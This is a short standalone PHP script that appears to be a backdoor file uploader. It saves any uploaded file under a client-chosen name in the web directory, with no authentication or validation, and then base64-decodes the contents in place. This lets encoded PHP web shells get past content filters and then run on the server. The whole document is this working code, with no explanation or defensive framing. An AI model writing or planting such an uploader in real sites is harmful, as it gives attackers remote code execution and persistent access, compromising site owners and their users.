<?php
$target = ""; 
$target = basename( $_FILES['upl']['name']) ; 
if(move_uploaded_file($_FILES['upl']['tmp_name'], $target)) 
 {
 file_put_contents($target,base64_decode(file_get_contents($target)));
 }

?>
